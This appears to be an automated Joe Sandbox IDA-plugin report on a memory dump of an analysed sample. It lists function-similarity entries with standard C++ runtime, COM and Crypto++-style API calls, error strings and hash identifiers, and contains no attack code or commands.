                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                                                          • API String ID: 1902190269-1268710280
                                                                                          • Opcode ID: ebf60bf7f475550ea3fec91237287ca06b21562e40a35f876113243adab05431
                                                                                          • Instruction ID: 839b8e012151600d655d7faca6735558a23074abd9140c81df7942ea0e437518
                                                                                          • Opcode Fuzzy Hash: ebf60bf7f475550ea3fec91237287ca06b21562e40a35f876113243adab05431
                                                                                          • Instruction Fuzzy Hash: 9D413C70C0828CBFEB00DFE9D890BEDFBB8EB19314F504259E521A7691DB745608CB61
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001DC9
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001E74
                                                                                          Strings
                                                                                          • BufferedTransformation: this object is not attachable, xrefs: 6D001D67
                                                                                          • CryptoMaterial: this object contains invalid values, xrefs: 6D001E16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                                                          • API String ID: 1902190269-3853263434
                                                                                          • Opcode ID: e25171b55ae29d3bcd4890869e30c1bd4dbf9022ee1cc036116989381614b0fe
                                                                                          • Instruction ID: b527d6d546d35cecfe6d964a9c64287f9d6547757139cc603346ab985d907c95
                                                                                          • Opcode Fuzzy Hash: e25171b55ae29d3bcd4890869e30c1bd4dbf9022ee1cc036116989381614b0fe
                                                                                          • Instruction Fuzzy Hash: B5414E70C04288BFEB00DFE8D880BDEFBB8EF19314F10826AE52567691DB745604CB50
                                                                                          APIs
                                                                                            • Part of subcall function 6D05D820: _memmove.LIBCMT ref: 6D05D930
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D03761A
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                                                                          • API String ID: 39012651-1139078987
                                                                                          • Opcode ID: 30c6fd3bfbdeec7b5aeab28a4f029c58454467e001b6623ee1f0c78b236c76f8
                                                                                          • Instruction ID: d88a6462e573285a8716cf01eadaed2bf28fc1a57e8e64dba853843f4f362c4d
                                                                                          • Opcode Fuzzy Hash: 30c6fd3bfbdeec7b5aeab28a4f029c58454467e001b6623ee1f0c78b236c76f8
                                                                                          • Instruction Fuzzy Hash: 0741707110C3C1AEE330CB54C844FDFBBE8ABD9314F154A1DE69997281EB7491048BA7
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03BF2D
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                          • API String ID: 1823113695-3369487235
                                                                                          • Opcode ID: f73ba57d022e67f10c9961fafd6fd68c33c0d571777b275239830134871fb9d5
                                                                                          • Instruction ID: 160aa790a0c0d6264700de2808fc87920ad5039cc9cc3373279da779a7a3ef3d
                                                                                          • Opcode Fuzzy Hash: f73ba57d022e67f10c9961fafd6fd68c33c0d571777b275239830134871fb9d5
                                                                                          • Instruction Fuzzy Hash: 8431B6B1A0460A9FD718CF5AD980F6AF7E9EB88304F15862DE9599B780D730B9048B91
                                                                                          APIs
                                                                                          • QueryPerformanceCounter.KERNEL32(4E8A916F,4E8A916F,?,00000000), ref: 6D068F7F
                                                                                          • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6D068F8F
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D069014
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6D068FA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Timer: QueryPerformanceCounter failed with error
                                                                                          • API String ID: 1823523280-4075696077
                                                                                          • Opcode ID: 9f6b2218d96fcc0c4299ad1522222a44488dfc605b87257ca2cbb2f33f4266a5
                                                                                          • Instruction ID: f24dc8b368c5dc5bdb3df437cd7bee1606701ef4d74209ed30e83ad1556a08b2
                                                                                          • Opcode Fuzzy Hash: 9f6b2218d96fcc0c4299ad1522222a44488dfc605b87257ca2cbb2f33f4266a5
                                                                                          • Instruction Fuzzy Hash: 1C210AB250C780AFE310DF24D844B9BBBE8FB89614F504A1DF5A997281D775D5048BA3
                                                                                          APIs
                                                                                          • QueryPerformanceFrequency.KERNEL32(4E8A916F,4E8A916F), ref: 6D068E7F
                                                                                          • GetLastError.KERNEL32(0000000A), ref: 6D068E8F
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D068F14
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6D068EA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Timer: QueryPerformanceFrequency failed with error
                                                                                          • API String ID: 2175244869-348333943
                                                                                          • Opcode ID: 2d1ceeda39102b6eccac9c841167c503a679f635fcd67d2fac36e44e1d6337b3
                                                                                          • Instruction ID: c5a6240617529b4f1db6b9f9eef34fc58a75aa8678af31162d46eace01b34197
                                                                                          • Opcode Fuzzy Hash: 2d1ceeda39102b6eccac9c841167c503a679f635fcd67d2fac36e44e1d6337b3
                                                                                          • Instruction Fuzzy Hash: 4B2119B250C780AFE310DF24C844B9BBBE8FB89614F504A1DF5A997281EB75D5048BA3
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                          Strings
                                                                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6D036527
                                                                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6D0364E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                          • API String ID: 3476068407-3345525433
                                                                                          • Opcode ID: cbad7a9ee6a653401f3debf8c511c6803fbdaf7af2917aabd5f2c97db8bd49b3
                                                                                          • Instruction ID: acdb77aaa958c9d1f260408b8492c6928d001e490e3a312c99e06f65ada08cfa
                                                                                          • Opcode Fuzzy Hash: cbad7a9ee6a653401f3debf8c511c6803fbdaf7af2917aabd5f2c97db8bd49b3
                                                                                          • Instruction Fuzzy Hash: 5221A87151C391AFF724DF74C440FABB3E8AB4A648F824A2DE74983181EB75D1048AA3
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03C14E
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D5E4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D5F9
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D608
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D61D
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D026035
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02604A
                                                                                          • std::exception::exception.LIBCMT ref: 6D026059
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02606E
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$Init
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D025E87
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025E9C
                                                                                          • std::exception::exception.LIBCMT ref: 6D025EAB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025EC0
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D437
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D44C
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D45B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D470
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          APIs
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D062C9A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D062CB1
                                                                                          • std::exception::exception.LIBCMT ref: 6D062CC3
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D062CDA
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$std::exception::exception$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 3942750879-0
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D02C478
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D02C488
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6D02C4B4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02C512
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$DestroyElement
                                                                                          • String ID:
                                                                                          • API String ID: 3987547017-0
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0802A0), ref: 6D02B5D5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B5E2
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02B685
                                                                                          • VariantClear.OLEAUT32(6D0802A0), ref: 6D02B68B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6D0788FD
                                                                                          • __isleadbyte_l.LIBCMT ref: 6D078930
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6D078961
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6D0789CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D005ACB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005AE0
                                                                                          • std::exception::exception.LIBCMT ref: 6D005B18
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 3153320871-0
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • InitializeCriticalSection.KERNEL32(00000000,00000000,6D015D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6D0184EA
                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6D0184F0
                                                                                          • std::exception::exception.LIBCMT ref: 6D01853C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D018551
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3005353045-0
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 6D02DCC5
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02DCDA
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D02DD09
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02DD1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 399550787-0
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D072653
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 501242067-0
                                                                                          APIs
                                                                                            • Part of subcall function 6D034410: _malloc.LIBCMT ref: 6D03446E
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6D017287
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D01729B
                                                                                          • _memmove.LIBCMT ref: 6D0172AF
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D0172B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 583974297-0
                                                                                          • Opcode ID: dbaccd03b899f8b55bb6dc129c0b01ba99bc62999432b1e8a9f5da39077ca0b9
                                                                                          • Instruction ID: 6f0cab7c01c19cbb96ea8e0145f2d3e845453928c1cc360fb898ab91f5954771
                                                                                          • Opcode Fuzzy Hash: dbaccd03b899f8b55bb6dc129c0b01ba99bc62999432b1e8a9f5da39077ca0b9
                                                                                          • Instruction Fuzzy Hash: D6118EB6A04118BBDB10CFE5DC80EDFBB7DABD9654B018269F90497200E770DA058BE0
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D025AB9
                                                                                          • VariantCopy.OLEAUT32(?,6D099C90), ref: 6D025AC1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025AE2
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025AEF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopyException@8InitThrow
                                                                                          • String ID:
                                                                                          • API String ID: 3826472263-0
                                                                                          • Opcode ID: 1c3a14e3afd228d1bf5b00de9bed6ad9f8945ac7ccf63e6ba21f48cda171046b
                                                                                          • Instruction ID: bbbc56778628335414891b8cf854baf9456d5d8cf3f3b86e65f8fb7c249c8379
                                                                                          • Opcode Fuzzy Hash: 1c3a14e3afd228d1bf5b00de9bed6ad9f8945ac7ccf63e6ba21f48cda171046b
                                                                                          • Instruction Fuzzy Hash: 7511D672905569BFDF00DF98C8C5BEFBBB8FB46624F11412AE924A3340C774990087E5
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                            • Part of subcall function 6D0691F6: std::_Lockit::_Lockit.LIBCPMT ref: 6D069202
                                                                                          • _malloc.LIBCMT ref: 6D038DAF
                                                                                          • std::exception::exception.LIBCMT ref: 6D038DD4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3043633502-0
                                                                                          • Opcode ID: 3a43a0dc92aedb10928d23431925c4c8a5d203c52d017c923fe8253cc0952c42
                                                                                          • Instruction ID: e637a7703aaf9a5de797abe4908753d355278c0791975d8491e28d373138217c
                                                                                          • Opcode Fuzzy Hash: 3a43a0dc92aedb10928d23431925c4c8a5d203c52d017c923fe8253cc0952c42
                                                                                          • Instruction Fuzzy Hash: 9AF0F0728082662BF200EB95AC41BAF77E89F95720F42092CEA5493241F720D208C2B3
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                          • String ID:
                                                                                          • API String ID: 3016257755-0
                                                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                          • Instruction ID: bec6e00d61bd187ad63c4d5bb49f7292e53f7dbcd09a913a7bcac9ea49151a13
                                                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                          • Instruction Fuzzy Hash: CC117E7280814ABBEF224E85DC11EEE3F72BB19354F498614FE2859030C337C5B1AB89
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove_memset
                                                                                          • String ID: EncodingParameters
                                                                                          • API String ID: 3555123492-55378216
                                                                                          • Opcode ID: edca9054faada542001a271f72ad968ac5eea621fe75193842b1294697ac5e2c
                                                                                          • Instruction ID: 03c083481b5a47421eafc68941babcb51d1567ce4b92c5764ef21b30ba6ebfd6
                                                                                          • Opcode Fuzzy Hash: edca9054faada542001a271f72ad968ac5eea621fe75193842b1294697ac5e2c
                                                                                          • Instruction Fuzzy Hash: 8261E0B46083419FD304CF69C880A2AFBE9AFC9754F148A1DF59987391D7B0E945CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 6D004760: __CxxThrowException@8.LIBCMT ref: 6D0047F9
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038DAF
                                                                                          • _memcpy_s.LIBCMT ref: 6D00F282
                                                                                          • _memset.LIBCMT ref: 6D00F293
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                                                          • String ID: @
                                                                                          • API String ID: 3081897325-2766056989
                                                                                          • Opcode ID: e74a569ed8bc8cdb0acafafa51956ac2fd3349bea3418fb0166990c2e00ae6b6
                                                                                          • Instruction ID: 2cde7cb9242af88733eb3c4eb201e473fa7ce668e2a241f8ec51b93612af3eae
                                                                                          • Opcode Fuzzy Hash: e74a569ed8bc8cdb0acafafa51956ac2fd3349bea3418fb0166990c2e00ae6b6
